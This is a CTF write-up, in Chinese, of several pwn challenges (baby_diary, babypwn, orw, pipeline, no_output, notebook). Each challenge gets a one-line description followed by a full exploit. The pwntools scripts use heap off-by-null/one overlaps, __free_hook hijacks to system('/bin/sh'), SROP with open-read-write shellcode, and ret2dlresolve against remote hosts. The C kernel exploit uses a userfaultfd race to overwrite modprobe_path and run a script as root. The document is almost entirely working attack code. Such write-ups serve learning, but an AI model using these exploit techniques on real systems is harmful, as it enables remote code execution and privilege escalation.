notebook一题在fmyy师傅的指导下赛后复现成功,orz,做了一天还没出,我tmd的怎么这么菜=.=
baby_diary
off by null,堆风水造堆重叠,劫持free_hook为system来getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Connection setup shared by the exploit body below: pwntools context,
# then either a local process (DEBUG=1) or the remote CTF service.
context.log_level = 'debug'
binary = 'baby_diary'
elf = ELF('baby_diary')
libc = elf.libc  # libc that pwntools resolves for the local binary; the remote libc is assumed to match (not verified here)
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    #p = process(["qemu-aarch64","-L","",binary])
    #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
    host = "8.140.114.72"
    port = 1399
    p = remote(host,port)
# l64/l32: read until the first 0x7f (resp. 0xf7) byte, keep the last 6 (resp. 4)
# bytes of what was read, zero-pad to a full word and unpack it.
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Short aliases over the tube; sla/sa/ru coerce their prompt (and value) with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
    """Choose menu entry *idx* at the ">> " prompt."""
    p.sendlineafter(">> ", str(idx))
def add(size,payload = ""):
    """Menu 1: allocate a note of *size* bytes.

    *payload* is sent verbatim at the content prompt; when it is empty a
    bare newline is sent instead.
    """
    cmd(1)
    sla("size: ",str(size))
    content = payload if payload else '\n'
    sa("content: ", content)
def free(idx):
    """Menu 3: delete note *idx*."""
    cmd(3)
    p.sendlineafter("index: ", str(idx))
def show(idx):
    """Menu 2: print note *idx*."""
    cmd(2)
    p.sendlineafter("index: ", str(idx))
# Exploit body (page header: off-by-null -> heap feng shui -> overlapping
# chunks -> __free_hook overwritten with system). Written for Python 2
# pwntools: payloads are str and mix raw bytes with p64() output.
# The "#N" comments are the author's note indices.
# --- stage 1: eleven notes, indices 0-10 ---
add(0x100+0x60) #0
add(0x4f0) #1
add(0x1f0) #2
add(0x4f0) #3
add(0x4f0) #4
add(0x4f0) #5
add(0x4f0) #6
add(0x4f0) #7
add(0x4f0) #8
add(0x4f0) #9
add(0x4f0) #10
# --- stage 2: free 6,4,8,3 and reallocate; note 3's 0x527-byte content is
# 0x4e8 zero bytes, p64(0x109), 8 more zero bytes, newline ---
free(6)
free(4)
free(8)
free(3)
add(0x527,"\x00"*0x4e8+p64(0x109)+'\x00'*0x8+'\n')#3
add(0x4c0)#4
add(0x4f0)#6
add(0x4f0)#8
# --- stage 3: two more free/allocate rounds over notes 4-8 ---
free(4)
free(5)
add(0x4f0)#4
add(0x4c0)
free(8)
free(4)
free(6)
add(0x4f0,"\x00"*0x8+'\n')#4
add(0x4f0)#6
add(0x4f0)#8
free(6)
free(8)
free(7)
add(0x520,"\x00"*0x4f0+p64(0)+p64(0)+'\n')#6
add(0x4c0)#8
add(0x4f0)#7
free(5)
add(0x490,"a\n")
add(0x10)
# --- stage 4: note 11 is freed and re-created twice; the first re-creation
# sends exactly 0x27 bytes with no newline (add() forwards the payload as is),
# the second sends 0x18 zero bytes followed by p64(0x109) ---
free(11)
add(0x27,"\x00"*0x27)
free(11)
add(0x27,'\x00'*0x18+p64(0x109)+'\n')
free(4)
add(0x520)
add(0x1000)
# --- stage 5: leak. show(5) prints a libc pointer; the base is that pointer
# minus 1472+0x10 minus __malloc_hook's offset (constants are for this libc build) ---
show(5)
libc_base = l64()-1472-libc.sym["__malloc_hook"]-0x10
lg("libc_base",libc_base)
# --- stage 6: note 4's content is re-created twice with 0x20 'a', p64(0),
# p64(0x201) and then two pointer slots: first zeros, then __free_hook twice ---
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x201)+p64(0)*2+'\n')
free(2)
free(8)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x201)+p64(libc_base+libc.sym["__free_hook"])*2+'\n')
add(0x1f0,"/bin/sh\x00"*0x2+'\n')   # content that ends up as system()'s argument (per the header note)
add(0x1f0,p64(libc_base+libc.sym["system"])+'\n')   # per the header note this allocation lands on __free_hook
# gdb.attach(p,"b *$rebase(0x17D7)")
free(4)   # the free that goes through the hook
p.interactive()
babypwn
off by one,unlink造堆重叠,劫持stdout泄露libc,劫持free_hook为setcontext函数来srop从而orw出flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Connection setup shared by the exploit body below: pwntools context,
# then either a local process (DEBUG=1) or the remote CTF service.
context.log_level = 'debug'
binary = 'babypwn'
elf = ELF('babypwn')
libc = elf.libc  # libc that pwntools resolves for the local binary; the remote libc is assumed to match (not verified here)
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    #p = process(["qemu-aarch64","-L","",binary])
    #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
    host = "39.105.130.158"
    port = 8888
    p = remote(host,port)
# l64/l32: read until the first 0x7f (resp. 0xf7) byte, keep the last 6 (resp. 4)
# bytes of what was read, zero-pad to a full word and unpack it.
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Short aliases over the tube; sla/sa/ru coerce their prompt (and value) with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
    """Choose menu entry *idx* at the ">>> " prompt (the prompt ends in a newline)."""
    p.sendlineafter(">>> \n", str(idx))
def add(size):
    """Menu 1: allocate a note of *size* bytes (no content is sent)."""
    cmd(1)
    p.sendlineafter("size:\n", str(size))
def free(idx):
    """Menu 2: delete note *idx*."""
    cmd(2)
    p.sendlineafter("index:\n", str(idx))
def show(idx):
    """Menu 4: print note *idx*."""
    cmd(4)
    p.sendlineafter("index:\n", str(idx))
def edit(idx,payload):
    """Menu 3: overwrite note *idx* with *payload*, sent verbatim (no newline added)."""
    cmd(3)
    sla("index:\n", idx)
    sa("content:\n", payload)
# Exploit body (page header: off-by-one -> unlink -> overlapping chunks,
# stdout hijack for the libc leak, __free_hook -> setcontext, then an
# open/read/write chain). Python 2 pwntools: payloads are str.
# NOTE(review): indentation was lost in extraction. Each `for` body below is
# taken to be the single statement that follows it, which is consistent with
# the author's "#10" index comment on the eleventh allocation — confirm.
# --- stage 1: notes 0-6 of 0xf0, 7-8 of 0xf8, 9-10 of 0x100 ---
for i in range(7):
    add(0xf0)
add(0xf8)
add(0xf8)
add(0x100)
add(0x100)#10
for i in range(7):
    free(i)
free(7)
# --- stage 2: the three edits write 0xf8 bytes into note 8, then
# 0xf0 'a' + p64(0) + p64(0x121) into note 9, then 0xf0 'a' + p64(0x200)
# into note 8 (the one-byte-past-the-end write the header refers to) ---
edit(8,"a"*0xf8)
edit(9,"a"*0xf0+p64(0)+p64(0x121))
edit(8,"a"*0xf0+p64(0x200))
free(9)
add(0xf0)
"""
for ( i = 2; i > 0; --i )
a1 ^= (32 * a1) ^ ((a1 ^ (32 * a1)) >> 17) ^ (((32 * a1) ^ a1 ^ ((a1 ^ (32 * a1)) >> 17)) << 13);
"""
# --- stage 3: refill and free again, then a 0xd0 note ---
for i in range(7):
    add(0xf0)
add(0xf0)
add(0xf0)
for i in range(6):
    free(i)
free(8)
free(9)
add(0xd0)
edit(0,p16(0x4760))   # two-byte partial overwrite; the value is specific to this libc build
add(0xf0)
add(0xf0)
# stdout flags 0xfbad1887, three zero words and one zero byte: the stdout
# hijack the header note uses for the leak.
edit(2,p64(0xfbad1887)+p64(0)*3+p8(0))
libc_base= l64()-0x3ed8b0   # leaked pointer minus its fixed offset from the libc base (build-specific)
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
# '+' binds tighter than '&', so this is (sym + base) & ~0xfff: the start of
# the page holding __free_hook. Parenthesising would make that explicit.
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
setcontext = libc_base+libc.sym["setcontext"]+53   # +53 is an entry offset for this libc build
# Gadget offsets for the remote libc build; they are meaningless on any other libc.
pop_rdi = 0x000000000002155f+libc_base
pop_rsi = libc_base + 0x0000000000023e6a
pop_rdx = libc_base + 0x0000000000001b96
pop_rax = libc_base + 0x00000000000439c8
syscall = 0x00000000000d2975+libc_base
free(0)
edit(1,p64(libc_base+libc.sym["__free_hook"]))   # same value as free_hook above, recomputed inline
add(0xd0)
add(0xd0)
# Signal frame consumed by setcontext: rsp/rsi point at the free_hook1 page,
# rdx = 0x2000, rip = syscall gadget.
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
edit(3,p64(setcontext))
edit(1,str(frame))   # str(frame) serialises the frame under Python 2 pwntools
# Chain: syscall 10 (mprotect on x86-64) over 0x2000 bytes at free_hook1 with
# prot 7, then continue at free_hook1+0x68 where the shellcode is placed.
payload = [pop_rdi,free_hook1,pop_rsi,0x2000,pop_rdx,0x7,pop_rax,10,syscall,free_hook1+0x68]
sc = shellcraft.open("flag.txt",0)
sc += shellcraft.read("rax",free_hook1+0x100,0x100)
sc += shellcraft.write(1,free_hook1+0x100,0x100)
free(1)   # the free that goes through the hook
p.sendline(flat(payload).ljust(0x68,'\x90')+asm(sc))   # chain NOP-padded to 0x68, then the shellcode
# gdb.attach(p)
p.interactive()
orw
数组越界劫持free_got为堆地址,没开nx,free之后执行shellcode
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Connection setup shared by the exploit body below: pwntools context,
# then either a local process (DEBUG=1) or the remote CTF service.
context.log_level = 'debug'
binary = 'orw'
elf = ELF('orw')
libc = elf.libc  # resolved but not used by the visible code
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    #p = process(["qemu-aarch64","-L","",binary])
    #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
    host = "39.105.131.68"
    port = 12354
    p = remote(host,port)
# l64/l32: read until the first 0x7f (resp. 0xf7) byte, keep the last 6 (resp. 4)
# bytes of what was read, zero-pad to a full word and unpack it.
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Short aliases over the tube; sla/sa/ru coerce their prompt (and value) with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
    """Choose menu entry *idx* at the ">>" prompt (the prompt ends in a newline)."""
    p.sendlineafter(">>\n", str(idx))
def add(size,payload,idx):
    """Menu 1: answer the index and size prompts, then send *payload* verbatim at the content prompt."""
    cmd(1)
    for prompt, value in (("index:\n", idx), ("size:\n", size)):
        sla(prompt, value)
    sa("content:\n", payload)
# Exploit body (page header: out-of-bounds index -> free's GOT entry points
# into the heap; NX is off so the note content runs when freed).
# Shellcode: open("flag", 0), read(rax, rsp, 0x100), write(1, rsp, 0x100).
sc = shellcraft.open("flag",0)
sc += shellcraft.read("rax","rsp",0x100)
sc += shellcraft.write(1,"rsp",0x100)
# Index -0x19 is negative: the out-of-bounds index the header note refers
# to. Size 0; content is the assembled shellcode plus a newline.
add(0,asm(sc)+'\n',-0x19)
# gdb.attach(p,"b *$rebase(0xE95)")
p.interactive()
pipeline
堆溢出,可以劫持堆中指针造成任意地址写原语,劫持free_hook为system来getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
# Connection setup shared by the exploit body below: pwntools context,
# then either a local process (DEBUG=1) or the remote CTF service.
#context.log_level = 'debug'
binary = 'pipeline'
elf = ELF('pipeline')
libc = elf.libc  # libc that pwntools resolves for the local binary; the remote libc is assumed to match (not verified here)
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    #p = process(["qemu-aarch64","-L","",binary])
    #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
    host = "59.110.173.239"
    port = 2399
    p = remote(host,port)
# l64/l32: read until the first 0x7f (resp. 0xf7) byte, keep the last 6 (resp. 4)
# bytes of what was read, zero-pad to a full word and unpack it.
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Short aliases over the tube; sla/sa/ru coerce their prompt (and value) with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
    """Choose menu entry *idx* at the ">> " prompt."""
    p.sendlineafter(">> ", str(idx))
def add():
    """Menu 1: create a new note; the binary asks for nothing else."""
    p.sendlineafter(">> ", "1")
def edit(idx,offset,size):
    """Menu 2: answer the index, offset and size prompts for note *idx*, in that order."""
    cmd(2)
    for prompt, value in (("index: ", idx), ("offset: ", offset), ("size: ", size)):
        sla(prompt, value)
def show(idx):
    """Menu 5: print note *idx*."""
    cmd(5)
    p.sendlineafter("index: ", str(idx))
def destory():
    """Menu 3: delete a note.

    NOTE(review): `idx` is not a parameter and is not defined anywhere in
    this script, so calling this raises NameError. It is never called here
    (the exploit triggers the free through edit(1,0,0) instead); a fixed
    version would take `idx` as an argument like the other helpers.
    """
    cmd(3)
    sla("index: ",str(idx))
def append(idx,size,payload):
    """Menu 4: append *payload* (sent verbatim) to note *idx*, declaring *size* at the size prompt."""
    cmd(4)
    sla("index: ", idx)
    sla("size: ", size)
    sa("data: ", payload)
# Exploit body (page header: heap overflow -> hijack a heap pointer ->
# arbitrary write -> __free_hook = system). Python 2 pwntools: payloads are str.
# --- notes 0-4 ---
add()
add()
add()
add()
add()
edit(0,0,0x500)
edit(1,0,0x100)
edit(0,0,0)      # shrink note 0 to size 0, then grow it back to 0x20
edit(0,0,0x20)
# --- leak: show(0) prints a libc pointer; 0x1ec010 is its offset from the base for this build ---
show(0)
libc_base = l64() - 0x1ec010
lg("libc_base",libc_base)
free_hook = libc_base + libc.sym["__free_hook"]   # both values are recomputed inline below
sys_addr = libc_base + libc.sym["system"]
add()   # note 5
# Append to note 0 with size 0xffff00f0 (passed as a str; sla would str() it
# anyway): 0x28 'a', p64(0x21), the address of __free_hook, p64(0x0000002000000000).
append(0,str(0xffff00f0),"a"*0x28+p64(0x21)+p64(libc_base+libc.sym["__free_hook"])+p64(0x0000002000000000)+'\n')
append(5,str(0x10),p64(libc_base+libc.sym["system"])+'\n')
append(1,0x8,"/bin/sh\x00")   # no trailing newline: exactly 8 bytes are sent
# gdb.attach(p,"b *$rebase(0x1861)")
edit(1,0,0)   # per the header note, resizing note 1 to 0 is what reaches the hooked free
p.interactive()
no_output
signal异常进栈溢出,ret2dl一把梭
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
from roputils import*
# Connection setup shared by the exploit body below: pwntools context,
# then either a local process (DEBUG=1) or the remote CTF service.
#context.log_level = 'debug'
binary = './test'
elf = ELF('./test')
# libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
    p = process(binary)
    #p = process(["qemu-aarch64","-L","",binary])
    #p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
    host = "39.105.138.97"
    port = 1234
    p = remote(host,port)
# l64/l32: read until the first 0x7f (resp. 0xf7) byte, keep the last 6 (resp. 4)
# bytes of what was read, zero-pad to a full word and unpack it. Unused below.
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Short aliases over the tube; sla/sa/ru coerce their prompt (and value) with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
# Exploit body (page header: a signal-raising input leads into a stack
# overflow, solved with ret2dl-resolve).
# open_plt/read_plt/pop3r are only referenced by the commented-out hand-built
# payload below; the live chain is built with roputils. Because
# `from roputils import *` comes after `from pwn import *`, the ROP used here
# is roputils' (rop.fill / dl_resolve_call / dl_resolve_data are its API).
open_plt = 0x080490F0
read_plt = 0x80490C0
pop3r = 0x08049581
p.send("a"*0x30)
sleep(0.01)   # short pause so consecutive sends are not coalesced into one read
p.send("\x00"*0x20)
sleep(0.01)
# p.send("hello_boy".ljust(0x10,'\x00'))
# sleep(0.01)
# NOTE(review): presumably the INT_MIN / -1 pair that raises the signal the
# header mentions — confirm against the binary.
p.sendline("-2147483648")
p.sendline("-1")
# payload = "\x00"*0x48+p32(0)+p32(read_plt)
# payload += p32(pop3r)+p32(0x0)+p32(0x0804c018)+p32(0x100)
# # payload += p32(read_plt) + p32(pop3r) + p32(0) + p32(0x804C040+0x100) + p32(0x8)
# # payload += p32(0x80494D6)
# # payload += p32(0x804C040+0x100) + p32(0x804C034)
# # payload += p32(0x1234)
rop = ROP('./test')
offset = 76   # padding before the overwritten return address — presumably measured, not shown here
bss_addr = rop.section('.bss')
# Stage 1: pad, read(0, .bss, 0x100), then the dl-resolve call whose data lives at .bss+20.
payload = rop.fill(offset)
payload += rop.call("read",0,bss_addr,0x100)
payload += rop.dl_resolve_call(bss_addr + 20,bss_addr)
p.send(payload)
# Stage 2 (what the read above receives): "/bin/sh;" padded to 20 bytes,
# the dl-resolve data for "system" at .bss+20, padded to 100 bytes.
payload = rop.string("/bin/sh;")
payload += rop.fill(20,payload)
payload += rop.dl_resolve_data(bss_addr + 20,'system')
payload += rop.fill(100,payload)
sleep(0.01)
p.send(payload)
# buf = rop
# # gdb.attach(p,"b *0x804947D")
p.interactive()
notebook
userfault条件竞争造uaf,而后劫持数组指针造任意地址读写,劫持modprobe_path
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PAGE_SIZE 0x1000
//cat /proc/kallsyms | grep modprobe_path
#define MOD_PROBE 0x125d2e0   /* offset of modprobe_path from the kernel base (from kallsyms, see above) */
#define CHUNK_SIZE 0x100      /* not used by the visible code */
size_t user_cs, user_ss, user_rflags, user_sp;      /* written by save_status(); never read here */
size_t commit_creds = 0, prepare_kernel_cred = 0;   /* not used by the visible code */
size_t vmlinux_base = 0;                            /* not used by the visible code */
size_t modprobe_path;          /* not used: main() declares a local of the same name that shadows this */
int fd;                        /* /dev/notebook descriptor, opened in main() and used by every ioctl wrapper */
char tmp[0x100] = {0};         /* scratch buffer: note contents, popen() output, and the path written last */
size_t addr1[0x8] = {0};       /* addr1[0] is the 8 bytes write_handler() copies into the faulting page */
/*
 * Save cs, ss, rsp and rflags into the user_* globals.
 * The operands are in Intel order (destination first, memory on the left),
 * so this presumably requires -masm=intel — confirm the build flags.
 * Nothing on this page reads the saved values back; the commented-out
 * signal handlers in main() are the only hint at their intended use.
 */
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}
/*
 * Print *msg* (with a newline) and terminate the process immediately with
 * status -1. _exit() bypasses stdio flushing and atexit handlers, so when
 * stdout is not line-buffered (e.g. a pipe) the message can be lost.
 */
void errExit(char *msg) {
    printf("%s\n", msg);
    _exit(-1);
}
/*
 * Request record handed to the driver through ioctl(): idx selects a note,
 * size and buf describe the user buffer. Which fields are meaningful depends
 * on the command — add()/edit() fill all three, del() only idx, gift() only buf.
 */
struct Data {
    int64_t idx;
    int64_t size;
    char *buf;
};
/* ioctl 0x100: create note *index* with *size* bytes copied from *buf*. No return value is checked. */
void add(unsigned int index,char *buf,int64_t size) {
    struct Data data = { .idx = index, .size = size, .buf = buf };
    ioctl(fd,0x100,&data);
}
/*
 * ioctl 0x200: delete note *index*. Only idx is set; size and buf are left
 * uninitialised, so whatever is on the stack is passed along. The ioctl
 * result is not checked.
 */
void del(unsigned int index) {
    struct Data data;
    data.idx = index;
    ioctl(fd,0x200,&data);
}
/* ioctl 0x300: overwrite note *index* with *size* bytes from *buf*. Unused on this page; the result is not checked. */
void edit(unsigned int index,char *buf,int64_t size) {
    struct Data data = { .idx = index, .size = size, .buf = buf };
    ioctl(fd,0x300,&data);
}
/*
 * ioctl 100 (decimal — unlike the hex 0x100/0x200/0x300 commands above):
 * the driver fills *buf. main() passes a size_t[0x100] and reads it as
 * (pointer, size) pairs indexed by note number. idx and size are left
 * uninitialised and the result is not checked.
 */
void gift(char *buf){
    struct Data data;
    data.buf = buf;
    ioctl(fd,100,&data);
}
/*
 * Register one PAGE_SIZE page at *fault_page* with a new userfaultfd in
 * MISSING mode and start *handler* on its own thread, passing the uffd
 * (cast through void*) as the thread argument.
 *
 * Notes: the uffd is created O_CLOEXEC|O_NONBLOCK and is never closed; the
 * pthread_t is discarded so the thread is never joined; *handler* is typed
 * as a bare void* rather than void *(*)(void *), so pthread_create relies on
 * an implicit pointer conversion. API/REGISTER ioctl failures go to errExit().
 */
void registerUserfault(void *fault_page,void *handler)
{
    pthread_t thr;
    struct uffdio_api ua;
    struct uffdio_register ur;
    uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
    ua.api = UFFD_API;
    ua.features = 0;
    if (ioctl(uffd, UFFDIO_API, &ua) == -1)
        errExit("[-] ioctl-UFFDIO_API");
    ur.range.start = (unsigned long)fault_page;
    ur.range.len = PAGE_SIZE;
    ur.mode = UFFDIO_REGISTER_MODE_MISSING;
    if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
        errExit("[-] ioctl-UFFDIO_REGISTER");
    int s = pthread_create(&thr, NULL,handler, (void*)uffd);
    if (s!=0)
        errExit("[-] pthread_create");
}
/*
 * userfaultfd handler thread. *arg* is the uffd from registerUserfault().
 * Waits for the first fault, calls del(0) while the faulting kernel copy
 * is still blocked (this is the window the header note calls the race),
 * then resolves the fault with a page whose first 8 bytes are addr1[0].
 */
void* write_handler(void *arg)
{
    struct uffd_msg msg;
    unsigned long uffd = (unsigned long)arg;
    puts("[+] write_handler created");
    struct pollfd pollfd;
    int nready;
    pollfd.fd = uffd;
    pollfd.events = POLLIN;
    nready = poll(&pollfd, 1, -1);
    if (nready != 1)
        errExit("[-] Wrong pool return value");
    del(0);   /* runs before the fault is served: the main thread's write(fd, user_buf, 0) is still blocked */
    nready = read(uffd, &msg, sizeof(msg));
    if (nready <= 0) {
        errExit("[-]msg error!!");
    }
    char *page = (char*)mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        errExit("[-]mmap page error!!");
    struct uffdio_copy uc;
    /* BUG: sizeof(page) is the size of the pointer (8), not PAGE_SIZE, so only
     * 8 bytes are cleared. Harmless here because fresh anonymous mappings are
     * already zero-filled, but PAGE_SIZE was presumably intended. */
    memset(page, 0, sizeof(page));
    memcpy(page,addr1,8);   /* only addr1[0] is copied; the rest of the page stays zero */
    uc.src = (unsigned long)page;
    uc.dst = (unsigned long)msg.arg.pagefault.address & ~(PAGE_SIZE - 1);;   /* stray second ';' is an empty statement */
    uc.len = PAGE_SIZE;
    uc.mode = 0;
    uc.copy = 0;
    ioctl(uffd, UFFDIO_COPY, &uc);   /* return value not checked; a failed copy leaves the main thread blocked */
    puts("[+] writek_handler done!!");
    return NULL;
}
/*
 * Map a fresh page, register it with write_handler(), then write note 0 from
 * it. The first kernel access to user_buf faults, which hands control to the
 * handler thread. The mapping is never unmapped.
 */
void writeHeapFD() {
    char *user_buf = (char*)mmap(NULL,PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (user_buf == MAP_FAILED)
        errExit("[-] mmap user_buf error!!");
    registerUserfault(user_buf,write_handler);
    write(fd,user_buf,0);   /* blocks inside the kernel until write_handler() resolves the fault */
}
//codebase = 0xffffffffc0002000
//$rdx - 0x3fffbb00
/*
 * Entry point. Flow (see the header note): open /dev/notebook, read the
 * module base staged in /tmp/moduleaddr, find a note whose chunk can be
 * reused after free, derive the xor mask ("cookie"), use the userfaultfd
 * race in writeHeapFD() to redirect a freed chunk, then use the resulting
 * (pointer, size) entries to compute the kernel base and write modprobe_path.
 * Always returns 0 implicitly; errors call exit(0) or errExit().
 */
int main()
{
    save_status();
    /*signal(SIGSEGV, spawn_shell);
    signal(SIGTRAP, spawn_shell);*/
    fd = open("/dev/notebook",2);   /* 2 == O_RDWR */
    if(fd < 0){
        puts("open error");
        exit(0);
    }
    /* Module base: field 6 of /tmp/moduleaddr, parsed as hex. The stream is
     * never pclose()d and fread()'s result is not checked, so a missing or
     * short file leaves tmp empty and codebase == 0. */
    FILE *stream =popen("cat /tmp/moduleaddr | awk '{print $6}'","r");
    fread(tmp,0x12,1,stream);
    size_t codebase = strtoul(tmp,NULL,16);
    printf("codebase: 0x%llx\n",codebase);   /* %llx with a size_t: same width on LP64 but the portable format is %zx */
    if(fd < 0){   /* unreachable: the identical check above already exit()ed */
        puts("OPEN ERROR");
        exit(0);
    }
    puts("open success");
    for (int i=0;i<0x100;i++) {   /* clear the scratch buffer (it was also zero-initialised at file scope) */
        tmp[i] = '\x00';
    }
    add(0,tmp,0x60); //0
    add(0x1,tmp,0x60); //0   (this is note 1; the trailing comment is stale)
    size_t chunkList[0x100] = {0};   /* 2 KiB on the stack; gift() fills it with (pointer, size) pairs per note */
    gift(chunkList);
    size_t chunk1 = chunkList[2];    /* note 1's pointer */
    size_t chunk0 = chunkList[0];    /* note 0's pointer */
    del(0);
    del(1);
    /* Re-create note 0 until the driver hands back chunk1's address (up to 100 tries, no failure path). */
    for(int i = 0;i < 100;i++){
        add(0,tmp,0x60);
        gift(chunkList);
        printf("[+] chunk[0]:0x%llx\n",(size_t *)chunkList[0]);   /* a pointer is passed for %llx */
        if(chunkList[0] == chunk1){
            puts("[+] Find chunk[1]");
            break;
        }
        else{
            del(0);
        }
    }
    read(fd,chunkList,0);   /* read note 0's contents into chunkList */
    /* First word of the reused chunk xor'ed with both chunk addresses; the
     * result is the mask applied to every redirected pointer below. */
    size_t cookie = chunkList[0] ^ chunk1 ^ chunk0;
    printf("[+] cookie: 0x%llx\n",cookie);
    printf("chunk0:0x%llx\n",chunk0);
    printf("chunk1:0x%llx\n",chunk1);
    addr1[0] = (codebase+0x2500-0x10) ^ cookie ^ chunk1;   /* what write_handler() places in the faulting page */
    writeHeapFD();
    int x = 0;
    *(size_t*)(tmp + 0xf0) = cookie ^ (codebase + 0x2500 - 0x10);   /* same masked target, at offset 0xf0 of the note content */
    /* Allocate notes 0..14 until one lands on chunk1; x records that index. */
    for(int i = 0;i < 0xf;i++){
        add(i,tmp,0x60);
        gift(chunkList);
        if(chunkList[i*2] == chunk1){
            printf("[*] 0x%llx ==> Find chunk[%d]\n",chunkList[i*2],i);
            x = i;
            break;
        }
        if(i == 0xe){
            errExit("NOT FOUND!!!!!");
        }
    }
    add(x+1,tmp,0x60);
    /* Entries for notes 1 and 2: note 1 -> codebase+0x168 (0x100 bytes), note 2 -> codebase+0x2500 (0x100 bytes);
     * written through note x+1. NOTE(review): presumably note x+1 overlaps the driver's note table — confirm. */
    chunkList[2] = codebase + 0x168;
    chunkList[3] = 0x100;
    chunkList[4] = codebase + 0x2500;
    chunkList[5] = 0x100;
    write(fd,chunkList,x + 1);
    read(fd,chunkList,0);
    printf("0x%llx\n",chunkList[0]);
    printf("0x%llx\n",chunkList[1]);
    printf("0x%llx\n",chunkList[2]);
    /* Kernel base: the word read back plus codebase, OR'ed with the high 32
     * bits, minus a constant (0x476ac4) specific to this kernel build. */
    size_t kernel_base = (chunkList[0] + codebase);// | 0xFFFFFFFF00000000 - 0x476ac4;
    kernel_base = kernel_base | 0xFFFFFFFF00000000;
    kernel_base = kernel_base - 0x476ac4;
    printf("kernel_base:0x%llx\n",kernel_base);
    size_t modprobe_path = kernel_base + MOD_PROBE;   /* shadows the file-scope modprobe_path */
    chunkList[0] = modprobe_path;
    chunkList[1] = 0x100;
    write(fd,chunkList,1);
    strcpy(tmp,"/tmp/1.sh\x00");
    write(fd,tmp,0);   /* NOTE(review): presumably note 0 now resolves to modprobe_path, so this stores the script path there — confirm */
    /* Stage /tmp/1.sh (copies /flag to /tmp/flag and chmods it) and /tmp/aaa
     * (four 0xff bytes), make both executable, run /tmp/aaa, print /tmp/flag. */
    system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/1.sh");
    system("echo -ne '\xff\xff\xff\xff' > /tmp/aaa");
    system("chmod +x /tmp/1.sh");
    system("chmod +x /tmp/aaa");
    system("/tmp/aaa");
    system("cat /tmp/flag");
